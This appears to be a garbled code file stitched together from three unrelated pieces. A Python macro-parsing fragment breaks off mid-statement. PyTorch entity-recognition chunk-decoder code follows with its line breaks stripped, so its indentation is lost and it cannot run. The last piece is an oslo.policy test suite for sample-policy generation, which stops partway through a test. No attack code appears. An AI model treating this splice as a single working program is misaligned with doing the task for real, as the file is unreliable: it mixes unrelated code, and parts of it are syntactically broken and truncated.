                    self._UndoToken()
                    CurLine = self.Profile.FileLinesList[ReplacedLine - 1]
                    PreIndex = 0
                    StartPos = CurLine.find('$(', PreIndex)
                    EndPos = CurLine.find(')', StartPos+2)
                    while StartPos != -1 and EndPos != -1 and self._Token not in {TAB_IF_DEF, TAB_IF_N_DEF, TAB_IF, TAB_ELSE_IF}:
                        MacroName = CurLine[StartPos+2: EndPos]
                        MacorValue = self._GetMacroValue(MacroName)
                        if
self.span_embedding.output_size, "position_embedding": position_embedding, "allowed_a2h_relations": allowed_a2h_relations, "allowed_a2a2h_relations": allowed_a2a2h_relations, "constrained_outputs": constrained_outputs, **chunk_decoder, }}) multilabels = {} ner_label_to_multilabels = [None] * len(ner_labels) for ner_label, ner_multilabels in normalizer_scheme.items(): indices = [multilabels.setdefault(multilabel, len(multilabels)) for multilabel in ner_multilabels] ner_label_to_multilabels[ner_labels.index(ner_label)] = indices ner_label_to_multilabels = torch.as_tensor([ [True if idx in multilabel_indices else False for idx in range(len(multilabels))] for multilabel_indices in ner_label_to_multilabels ]).bool() multilabels = torch.as_tensor([ [label in multilabel for label in entity_labels] for multilabel in multilabels ]).bool() self.normalizer = Normalizer( input_size=self.span_embedding.output_size, multilabels=multilabels, ner_label_to_multilabels=ner_label_to_multilabels, **normalizer, ) def fast_params(self): return [ *self.chunk_decoder.fast_params(), *self.span_scorer.fast_params(), ] def on_training_step(self, current, total): self.chunk_decoder.on_training_step(current, total) def forward(self, words_embed, batch=None, return_loss=False, return_predictions=False): loss_dict = {} if return_loss is True: supervision = {*self.base_supervision, "span", "chunk_relation", "normalizer", "chunk_label", "reg", "coref"} # , "c2c", "label", "reg") elif return_loss is False: supervision = set(self.base_supervision) else: supervision = set(return_loss) if isinstance(words_embed, tuple): words_embed, lm_embeds = words_embed words_mask = batch['words_mask'] original_words_embed = words_embed if self.contextualizer is not None: words_embed = self.contextualizer(original_words_embed, words_mask) ############################ # Generate spans # ############################ spans = self.span_scorer(words_embed, words_mask, {**batch, "fragments_label": 
batch.get("fragments_ner_label", None)}, force_gold=bool({"local", "span", "label", "normalizer"} & supervision)) spans_mask, spans_begin, spans_end, spans_ner_label, spans_chunks, chunks_spans = ( spans["flat_spans_mask"], spans["flat_spans_begin"], spans["flat_spans_end"], spans["flat_spans_label"], batch["fragments_chunks"], batch["chunks_fragments"]) normalizer_result = self.normalizer(words_embed, spans_begin, spans_end, spans_ner_label, spans_mask, batch=batch, return_loss=bool({"local", "normalizer", "label"} & supervision)) spans_label = normalizer_result["prediction"] ################################## # Transform spans with attention # ################################## spans_embed = self.span_embedding(words_embed, spans_begin, spans_end, spans_label) ####################################### # Decode chunks (local scope cliques) # ####################################### chunks = self.chunk_decoder( words_embed=words_embed, words_mask=words_mask, spans_embed=spans_embed, spans_begin=spans_begin, spans_end=spans_end, spans_label=spans_label, spans_mask=spans_mask, batch=batch, supervision=supervision, ) ##################### # Sum up the losses # ##################### ##################### if "span" in supervision: span_loss_dict = self.span_scorer.loss(spans, {**batch, "fragments_label": batch.get("fragments_ner_label", None)}) del span_loss_dict["loss"] loss_dict.update(span_loss_dict) if "normalizer" in supervision: loss_dict["normalizer_loss"] = normalizer_result["loss"] if "chunk_relation" in supervision: loss_dict["chunk_relation_loss"] = chunks["chunk_relation_loss"] loss_dict["scope_tag_loss"] = chunks["scope_tag_loss"] # loss_dict["biaffine_relation_loss"] = chunks["biaffine_relation_loss"] if "chunk_label" in supervision: loss_dict["chunk_label_loss"] = chunks["chunk_label_loss"] loss = sum(sub_loss for sub_loss in loss_dict.values()) predictions = None if return_predictions: predictions = [{"fragments": [], "entities": []} for sample in 
batch["original_sample"]] entities_fragments = chunks["chunks_spans"] entities_mask = (entities_fragments != -1).any(-1) entities_label = chunks["chunks_labels"] if 0 not in entities_fragments.shape: for sample_idx, entity_idx in entities_mask.nonzero(as_tuple=False).tolist(): chunk_labels = entities_label[sample_idx, entity_idx].nonzero(as_tuple=True)[0].tolist() predictions[sample_idx]["entities"].append({ "entity_id": len(predictions[sample_idx]), "confidence": 1., # entities_confidence[sample_idx, entity_idx].item(), "chunks": [{ "chunk_id": len(predictions[sample_idx]), "confidence": 1., # entities_confidence[sample_idx, entity_idx].item(), "label": chunk_labels, "fragments": [ { "fragment_id": fragment_idx, "begin": spans_begin[sample_idx, fragment_idx].item(), "end": spans_end[sample_idx, fragment_idx].item(), "label": label, } for fragment_idx in entities_fragments[sample_idx, entity_idx].tolist() if fragment_idx >= 0 for label in spans_label[sample_idx, fragment_idx].nonzero(as_tuple=True)[0].tolist() if label in chunk_labels ] }] }) if 0 not in spans_mask.shape: # entities_confidence = entities_label_scores.detach().cpu()[-1].sigmoid().masked_fill(~entities_label, 1).prod(-1) # for sample_idx, entity_idx in (~entities_label[..., 0]).masked_fill(~entities_mask.cpu(), False).nonzero(as_tuple=False).tolist(): for sample_idx, fragment_idx in spans_mask.nonzero(as_tuple=False).tolist(): for label in spans_label[sample_idx, fragment_idx].nonzero(as_tuple=True)[0].tolist(): predictions[sample_idx]["fragments"].append({ "fragment_id": fragment_idx, "confidence": 1., # entities_confidence[sample_idx, entity_idx].item(), "begin": spans_begin[sample_idx, fragment_idx].item(), "end": spans_end[sample_idx, fragment_idx].item(), "label": label, }) return { "predictions": predictions, **loss_dict, "holes_delta_loss": chunks["holes_delta"].detach() if "holes_delta" in chunks else 0, "loss": loss, "spans": spans, "chunks": chunks, "words_embed": words_embed, 
"spans_embed": spans_embed, "normalized": normalizer_result, } @register("chunk_decoder", do_not_serialize=( "position_embedding", "allowed_a2h_relations", "allowed_a2a2h_relations", "constrained_outputs", )) class ChunkDecoder(torch.nn.Module): ENSEMBLE = "ensemble_chunk_decoder" def __init__(self, input_size, scope_head_size=64, position_embedding=None, allowed_a2h_relations=None, allowed_a2a2h_relations=None, constrained_outputs=None, do_target_links_count=True, scope_match_temperature=1., chunk_relation_loss_weight=1, scope_tag_loss_weight=1, label_loss_weight=0.5, do_biaffine=True, do_scopes=True, do_constraints="always", biaffine_scale=0.2, dropout_p=0.2, biaffine_mode="and", label_proj_pooling="max", attention_mode=('c2c', 'c2p', 'p2c'), scope_crf_params={}, symmetric_training=False, scope_supervision="word", do_scope_holes=True, ): super().__init__() if do_constraints is True: do_constraints = "always" assert do_constraints in ("always", False, "test-only") self.do_constraints = do_constraints self.register_buffer("allowed_a2h_relations", allowed_a2h_relations) self.register_buffer("allowed_a2a2h_relations", allowed_a2a2h_relations) self.register_buffer("constrained_outputs", constrained_outputs.float()) self.label_proj = torch.nn.Linear(input_size, constrained_outputs.shape[1]) self.label_proj.bias = None self.do_target_links_count = do_target_links_count self.scope_match_temperature = scope_match_temperature self.chunk_relation_loss = RelationLoss(symmetric=False, weight=chunk_relation_loss_weight) self.scope_tag_loss_weight = scope_tag_loss_weight self.label_loss_weight = label_loss_weight self.dropout = torch.nn.Dropout(dropout_p) self.symmetric_training = symmetric_training self.do_scopes = do_scopes self.label_proj_pooling = label_proj_pooling if label_proj_pooling == "embed-max": self.pre_label_proj = torch.nn.Linear(input_size, input_size) self.do_scope_holes = do_scopes and do_scope_holes self.scope_supervision = scope_supervision if do_scopes else 
False self.scope_tag_loss_weight = scope_tag_loss_weight if scope_supervision == "word" else 0. if self.do_scopes: if self.do_scope_holes: self.register_buffer('bounds_to_tags', torch.tensor([ # [0, 1, 1, 1, 1], [0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1], ], dtype=torch.float)) else: self.register_buffer('bounds_to_tags', torch.tensor([ # [0, 1, 1, 1, 1], [0, 0, 1, 0, 1], [0, 0, 0, 1, 1], ], dtype=torch.float)) self.scope_bias = torch.nn.Parameter(torch.zeros(self.bounds_to_tags.shape[1], dtype=torch.float)) self.scope_proj = RelativeAttention( size=input_size, n_heads=self.bounds_to_tags.shape[1], do_pooling=False, head_size=scope_head_size, pos_size=position_embedding.shape[-1] if position_embedding is not None else None, position_embedding=position_embedding, dropout_p=dropout_p, mode=attention_mode, head_bias=True, ) self.scope_pooler = Pooler(mode="mean") self.scope_decoder = ScopeCRF(**{**scope_crf_params, "do_holes": do_scope_holes}) assert biaffine_mode in ("and", "sum", "min") self.do_biaffine = do_biaffine self.biaffine_mode = biaffine_mode self.biaffine_scale = biaffine_scale # torch.nn.Parameter(torch.tensor(0.2)) if self.do_biaffine: self.biaffine_proj = RelativeAttention( size=input_size, n_heads=1, do_pooling=False, head_size=input_size, pos_size=position_embedding.shape[-1] if position_embedding is not None else None, position_embedding=position_embedding, head_bias=True, dropout_p=dropout_p, mode=attention_mode, ) self.progress = 0. def on_training_step(self, step_idx, total_steps): self.progress = 2. 
* float(step_idx) / total_steps def fast_params(self): return [self.scope_bias] if hasattr(self, 'scope_bias') else [] # *self.scope_decoder.parameters(), self.scope_bias, *self.label_proj.parameters()] def forward(self, words_embed, words_mask, spans_embed, spans_begin, spans_end, spans_label, spans_mask, batch=None, supervision=set()): device = words_embed.device sample_index = torch.arange(len(words_embed), device=device)[:, None] n_spans = spans_mask.shape[-1] res_dict = {} if (self.do_constraints == "test-only" and not self.training) or self.do_constraints == "always": allowed_a2h_relations = self.allowed_a2h_relations allowed_a2a2h_relations = self.allowed_a2a2h_relations else: allowed_a2h_relations = self.allowed_a2h_relations | self.allowed_a2h_relations.any(0) allowed_a2a2h_relations = self.allowed_a2a2h_relations | self.allowed_a2a2h_relations.any(0).any(0) ######################################### # CHUNK DECODING # ######################################### scope_logits = scope_tags_logprobs = scope_bounds_emissions = scope_emissions = scope_tags_logits = None spans_positions = (torch.stack([spans_begin], dim=-1), torch.stack([spans_end], dim=-1)) words_positions = (torch.stack([torch.arange(words_embed.shape[1], device=words_embed.device).view(1, -1).repeat_interleave(len(words_embed), dim=0)], dim=-1),) * 2 if self.do_scopes: # begin and end coordinates of each element (span or word) x = words_positions[0][:, None, :] - spans_positions[1][:, :, None] # span end -> word y = words_positions[1][:, None, :] - spans_positions[0][:, :, None] # span begin -> word spans_words_distance = torch.where( (x.sign() > 0) & (y.sign() > 0), torch.minimum(x, y), torch.where((x.sign() < 0) & (y.sign() < 0), torch.maximum(x, y), 0) ) span_word_attn = self.scope_proj( content_queries=spans_embed, content_keys=words_embed, mask=words_mask, relative_positions=spans_words_distance, ) scope_bounds_emissions = torch.cat([ *[span_word_attn[..., :2].masked_fill( torch.stack([ 
y.squeeze(-1) > 0, # start tag cannot be after span begin x.squeeze(-1) < 0, # stop tag cannot be before span end ], dim=-1), IMPOSSIBLE)], *([span_word_attn[..., 2:4]] if self.do_scope_holes else []), ], dim=-1) if not self.training else span_word_attn[..., :(4 if self.do_scope_holes else 2)] scope_emissions = scope_bounds_emissions[spans_mask] @ self.bounds_to_tags + self.scope_bias scope_mask = words_mask.unsqueeze(1).expand(*spans_mask.shape, -1)[spans_mask] scope_tags_logits = torch.zeros(span_word_attn.shape[:-1], device=scope_emissions.device, dtype=torch.float) scope_tags_logprobs = self.scope_decoder.marginal(scope_emissions, scope_mask) scope_tags_logits[spans_mask] = ( scope_tags_logprobs[..., [1, 2, 3, 4]].logsumexp(-1) - (scope_tags_logprobs[..., [0, 5, 6, 7, 8]].logsumexp(-1) if self.do_scope_holes else scope_tags_logprobs[..., 0]) ) scope_logits = self.scope_pooler( scope_tags_logits.unsqueeze(-1), (spans_begin.unsqueeze(1), spans_end.unsqueeze(1) + 1), )[..., 0] if self.do_biaffine: x = spans_positions[0][:, None, :] - spans_positions[1][:, :, None] y = spans_positions[1][:, None, :] - spans_positions[0][:, :, None] span_span_distance = torch.where( (x.sign() > 0) & (y.sign() > 0), torch.minimum(x, y), torch.where((x.sign() < 0) & (y.sign() < 0), torch.maximum(x, y), 0) ) biaffine_logits = self.biaffine_proj( content_queries=spans_embed, content_keys=spans_embed, mask=spans_mask, relative_positions=span_span_distance, )[..., 0] if self.do_biaffine and self.do_scopes: if self.biaffine_mode == "and": combined_logits = log_and(scope_logits, biaffine_logits) elif self.biaffine_mode == "min": combined_logits = torch.min(scope_logits, biaffine_logits) elif self.do_scopes: combined_logits = scope_logits elif self.do_biaffine: combined_logits = biaffine_logits if supervision: spans_chunks = batch["fragments_chunks"] chunks_spans = batch["chunks_fragments"] same_entity_target = None if "chunk_relation" in supervision: same_entity_target = ( 
(spans_chunks.unsqueeze(1).unsqueeze(-1) == spans_chunks.unsqueeze(2).unsqueeze(-2)) & (spans_chunks.unsqueeze(1).unsqueeze(-1) != -1) & (spans_chunks.unsqueeze(2).unsqueeze(-2) != -1) ).any(-1).any(-1) relation_mask = spans_mask[:, :, None] & spans_mask[:, None, :] has_overlap = (spans_begin.unsqueeze(-1) <= spans_end.unsqueeze(-2)) & (spans_end.unsqueeze(-1) >= spans_begin.unsqueeze(-2)) matching_logits = combined_logits.detach().masked_fill(~spans_mask.unsqueeze(-1), IMPOSSIBLE) ################################## # Fragment -> fragment relations # ################################## mydebug = None has_more_target_links = begin_targets = end_targets = hole_targets = pos_targets = scope_target = number_of_holes = None if "chunk_relation" in supervision: scope_loss_mask = (batch["has_chunks"][..., None] & spans_mask)[spans_mask] # allowed_a2h_relations: n_labels * n_labels # OLD # a2h_constraints = gather(allowed_a2h_relations[spans_label], index=spans_label.unsqueeze(1), dim=2) & relation_mask # NEW # spans_label: batch_size * n_spans * n_labels (bux) (bvy) # -> a2h_constraints: batch_size * n_spans * n_spans (xy) a2h_constraints = (torch.einsum( 'buy,bvy->buv', (torch.einsum('bux,xy->buy', spans_label.float(), allowed_a2a2h_relations.any(-1).float()) != spans_label.float().sum(-1, keepdim=True)).float(), spans_label.float().float() ) == 0.) & relation_mask & (spans_label & allowed_a2a2h_relations.any(0).any(0)).any(-1)[:, None, :] symmetric_a2h_target = same_entity_target & (a2h_constraints | a2h_constraints.transpose(-1, -2)) # two attributes can only be linked (and their relation penalized) if one is attached to a head that the other could be linked to a2a_constraints = torch.einsum( 'nih,njh->nij', symmetric_a2h_target.float(), a2h_constraints.float() ).bool() & relation_mask & symmetric_a2h_target.any(-1).unsqueeze(-2)
# Source project: openstack/oslo.policy
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import operator
from unittest import mock
import warnings

from oslo_config import cfg
import stevedore
import testtools
import yaml

from oslo_policy import generator
from oslo_policy import policy
from oslo_policy.tests import base
from oslo_serialization import jsonutils

# Shared fixture of policy rules, grouped by stevedore extension name.
OPTS = {'base_rules': [policy.RuleDefault('admin', 'is_admin:True',
                                          description='Basic admin check'),
                       policy.DocumentedRuleDefault('owner',
                                                    ('project_id:%'
                                                     '(project_id)s'),
                                                    'This is a long '
                                                    'description to check '
                                                    'that line wrapping '
                                                    'functions properly',
                                                    [{'path': '/foo/',
                                                      'method': 'GET'},
                                                     {'path': '/test/',
                                                      'method': 'POST'}])],
        'custom_field': [policy.RuleDefault('shared',
                                            'field:networks:shared=True')],
        'rules': [policy.RuleDefault('admin_or_owner',
                                     'rule:admin or rule:owner')],
        }


class GenerateSampleYAMLTestCase(base.PolicyBaseTestCase):
    """Tests for YAML sample-policy generation."""

    def setUp(self):
        super(GenerateSampleYAMLTestCase, self).setUp()
        self.enforcer = policy.Enforcer(self.conf, policy_file='policy.yaml')

    def test_generate_loadable_yaml(self):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        output_file = self.get_config_file_fullname('policy.yaml')
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            # generate sample-policy file with only rules
            generator._generate_sample(['base_rules', 'rules'], output_file,
                                       include_help=False)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['base_rules', 'rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True)

        self.enforcer.load_rules()

        self.assertIn('owner', self.enforcer.rules)
        self.assertIn('admin', self.enforcer.rules)
        self.assertIn('admin_or_owner', self.enforcer.rules)
        self.assertEqual('project_id:%(project_id)s',
                         str(self.enforcer.rules['owner']))
        self.assertEqual('is_admin:True', str(self.enforcer.rules['admin']))
        self.assertEqual('(rule:admin or rule:owner)',
                         str(self.enforcer.rules['admin_or_owner']))

    def test_expected_content(self):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        expected = '''# Basic admin check
#"admin": "is_admin:True"

# This is a long description to check that line wrapping functions
# properly
# GET  /foo/
# POST  /test/
#"owner": "project_id:%(project_id)s"

#"shared": "field:networks:shared=True"

#"admin_or_owner": "rule:admin or rule:owner"

'''
        output_file = self.get_config_file_fullname('policy.yaml')
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['base_rules', 'rules'], output_file)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['base_rules', 'rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True)

        with open(output_file, 'r') as written_file:
            written_policy = written_file.read()

        self.assertEqual(expected, written_policy)

    def test_expected_content_stdout(self):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        expected = '''# Basic admin check
#"admin": "is_admin:True"

# This is a long description to check that line wrapping functions
# properly
# GET  /foo/
# POST  /test/
#"owner": "project_id:%(project_id)s"

#"shared": "field:networks:shared=True"

#"admin_or_owner": "rule:admin or rule:owner"

'''
        stdout = self._capture_stdout()
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['base_rules', 'rules'],
                                       output_file=None)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['base_rules', 'rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True)

        self.assertEqual(expected, stdout.getvalue())

    def test_policies_deprecated_for_removal(self):
        rule = policy.RuleDefault(
            name='foo:post_bar',
            check_str='role:fizz',
            description='Create a bar.',
            deprecated_for_removal=True,
            deprecated_reason='This policy is not used anymore',
            deprecated_since='N'
        )
        opts = {'rules': [rule]}

        extensions = []
        for name, opts, in opts.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['rules']
        )

        expected = '''# DEPRECATED
# "foo:post_bar" has been deprecated since N.
# This policy is not used anymore
# Create a bar.
#"foo:post_bar": "role:fizz"

'''
        stdout = self._capture_stdout()
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['rules'], output_file=None)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True
            )

        self.assertEqual(expected, stdout.getvalue())

    def test_deprecated_policies_are_aliased_to_new_names(self):
        deprecated_rule = policy.DeprecatedRule(
            name='foo:post_bar',
            check_str='role:fizz',
            deprecated_reason=(
                'foo:post_bar is being removed in favor of foo:create_bar'
            ),
            deprecated_since='N',
        )
        new_rule = policy.RuleDefault(
            name='foo:create_bar',
            check_str='role:fizz',
            description='Create a bar.',
            deprecated_rule=deprecated_rule,
        )
        opts = {'rules': [new_rule]}

        extensions = []
        for name, opts in opts.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['rules'])

        expected = '''# Create a bar.
#"foo:create_bar": "role:fizz"

# DEPRECATED
# "foo:post_bar":"role:fizz" has been deprecated since N in favor of
# "foo:create_bar":"role:fizz".
# foo:post_bar is being removed in favor of foo:create_bar
"foo:post_bar": "rule:foo:create_bar"

'''
        stdout = self._capture_stdout()
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['rules'], output_file=None)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True
            )

        self.assertEqual(expected, stdout.getvalue())

    def test_deprecated_policies_with_same_name(self):
        deprecated_rule = policy.DeprecatedRule(
            name='foo:create_bar',
            check_str='role:old',
            deprecated_reason=(
                'role:fizz is a more sane default for foo:create_bar'
            ),
            deprecated_since='N',
        )
        new_rule = policy.RuleDefault(
            name='foo:create_bar',
            check_str='role:fizz',
            description='Create a bar.',
            deprecated_rule=deprecated_rule,
        )
        opts = {'rules': [new_rule]}

        extensions = []
        for name, opts in opts.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['rules'])

        expected = '''# Create a bar.
#"foo:create_bar": "role:fizz"

# DEPRECATED
# "foo:create_bar":"role:old" has been deprecated since N in favor of
# "foo:create_bar":"role:fizz".
# role:fizz is a more sane default for foo:create_bar

'''
        stdout = self._capture_stdout()
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['rules'], output_file=None)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True
            )

        self.assertEqual(expected, stdout.getvalue())

    def _test_formatting(self, description, expected):
        rule = [policy.RuleDefault('admin', 'is_admin:True',
                                   description=description)]
        ext = stevedore.extension.Extension(name='check_rule',
                                            entry_point=None,
                                            plugin=None, obj=rule)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=[ext], namespace=['check_rule'])

        output_file = self.get_config_file_fullname('policy.yaml')
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['check_rule'], output_file)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['check_rule'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True)

        with open(output_file, 'r') as written_file:
            written_policy = written_file.read()

        self.assertEqual(expected, written_policy)

    def test_empty_line_formatting(self):
        description = ('Check Summary \n'
                       '\n'
                       'This is a description to '
                       'check that empty line has '
                       'no white spaces.')
        expected = """# Check Summary
#
# This is a description to check that empty line has no white spaces.
#"admin": "is_admin:True"
"""
        self._test_formatting(description, expected)

    def test_paragraph_formatting(self):
        description = """
Here's a neat description with a paragraph. We want to make
sure that it wraps properly.
"""
        expected = """# Here's a neat description with a paragraph. We want \
to make sure
# that it wraps properly.
#"admin": "is_admin:True"
"""
        self._test_formatting(description, expected)

    def test_literal_block_formatting(self):
        description = """Here's another description.

  This one has a literal block.
  These lines should be kept apart.
  They should not be wrapped, even though they may be longer than 70 chars
"""
        expected = """# Here's another description.
#
#   This one has a literal block.
#   These lines should be kept apart.
#   They should not be wrapped, even though they may be longer than 70 chars
#"admin": "is_admin:True"
"""
        self._test_formatting(description, expected)

    def test_invalid_formatting(self):
        description = """Here's a broken description.

We have some text...
  Followed by a literal block without any spaces.
We don't support definition lists, so this is just wrong!
"""
        expected = """# Here's a broken description.
#
# We have some text...
#
# Followed by a literal block without any spaces.
# We don't support definition lists, so this is just wrong!
#"admin": "is_admin:True"
"""
        with warnings.catch_warnings(record=True) as warns:
            self._test_formatting(description, expected)
            self.assertEqual(1, len(warns))
            self.assertTrue(issubclass(warns[-1].category, FutureWarning))
            self.assertIn('Invalid policy description', str(warns[-1].message))


class GenerateSampleJSONTestCase(base.PolicyBaseTestCase):
    """Tests for JSON sample-policy generation."""

    def setUp(self):
        super(GenerateSampleJSONTestCase, self).setUp()
        self.enforcer = policy.Enforcer(self.conf, policy_file='policy.json')

    def test_generate_loadable_json(self):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        output_file = self.get_config_file_fullname('policy.json')
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            # generate sample-policy file with only rules
            generator._generate_sample(['base_rules', 'rules'], output_file,
                                       output_format='json',
                                       include_help=False)
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['base_rules', 'rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True)

        self.enforcer.load_rules()

        self.assertIn('owner', self.enforcer.rules)
        self.assertIn('admin', self.enforcer.rules)
        self.assertIn('admin_or_owner', self.enforcer.rules)
        self.assertEqual('project_id:%(project_id)s',
                         str(self.enforcer.rules['owner']))
        self.assertEqual('is_admin:True', str(self.enforcer.rules['admin']))
        self.assertEqual('(rule:admin or rule:owner)',
                         str(self.enforcer.rules['admin_or_owner']))

    def test_expected_content(self):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        expected = '''{
    "admin": "is_admin:True",
    "owner": "project_id:%(project_id)s",
    "shared": "field:networks:shared=True",
    "admin_or_owner": "rule:admin or rule:owner"
}
'''
        output_file = self.get_config_file_fullname('policy.json')
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['base_rules', 'rules'],
                                       output_file=output_file,
                                       output_format='json')
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['base_rules', 'rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True)

        with open(output_file, 'r') as written_file:
            written_policy = written_file.read()

        self.assertEqual(expected, written_policy)

    def test_expected_content_stdout(self):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        expected = '''{
    "admin": "is_admin:True",
    "owner": "project_id:%(project_id)s",
    "shared": "field:networks:shared=True",
    "admin_or_owner": "rule:admin or rule:owner"
}
'''
        stdout = self._capture_stdout()
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr) as mock_ext_mgr:
            generator._generate_sample(['base_rules', 'rules'],
                                       output_file=None,
                                       output_format='json')
            mock_ext_mgr.assert_called_once_with(
                'oslo.policy.policies', names=['base_rules', 'rules'],
                on_load_failure_callback=generator.on_load_failure_callback,
                invoke_on_load=True)

        self.assertEqual(expected, stdout.getvalue())

    @mock.patch.object(generator, 'LOG')
    def test_generate_json_file_log_warning(self, mock_log):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        output_file = self.get_config_file_fullname('policy.json')
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr):
            generator._generate_sample(['base_rules', 'rules'], output_file,
                                       output_format='json')
            mock_log.warning.assert_any_call(policy.WARN_JSON)


class GeneratorRaiseErrorTestCase(testtools.TestCase):
    """Error-propagation tests for the generator entry points."""

    def test_generator_raises_error(self):
        """Verifies that errors from extension manager are not suppressed."""
        class FakeException(Exception):
            pass

        class FakeEP(object):

            def __init__(self):
                self.name = 'callback_is_expected'
                self.require = self.resolve
                self.load = self.resolve

            def resolve(self, *args, **kwargs):
                raise FakeException()

        fake_ep = FakeEP()
        with mock.patch('stevedore.named.NamedExtensionManager',
                        side_effect=FakeException()):
            self.assertRaises(FakeException, generator._generate_sample,
                              fake_ep.name)

    def test_generator_call_with_no_arguments_raises_error(self):
        testargs = ['oslopolicy-sample-generator']
        with mock.patch('sys.argv', testargs):
            local_conf = cfg.ConfigOpts()
            self.assertRaises(cfg.RequiredOptError, generator.generate_sample,
                              [], local_conf)


class GeneratePolicyTestCase(base.PolicyBaseTestCase):
    def setUp(self):
        super(GeneratePolicyTestCase, self).setUp()

    def test_merged_rules(self):
        extensions = []
        for name, opts in OPTS.items():
            ext = stevedore.extension.Extension(name=name, entry_point=None,
                                                plugin=None, obj=opts)
            extensions.append(ext)
        test_mgr = stevedore.named.NamedExtensionManager.make_test_instance(
            extensions=extensions, namespace=['base_rules', 'rules'])

        # Write the policy file for an enforcer to load
        sample_file = self.get_config_file_fullname('policy-sample.yaml')
        with mock.patch('stevedore.named.NamedExtensionManager',
                        return_value=test_mgr):
            # generate sample-policy file with only rules
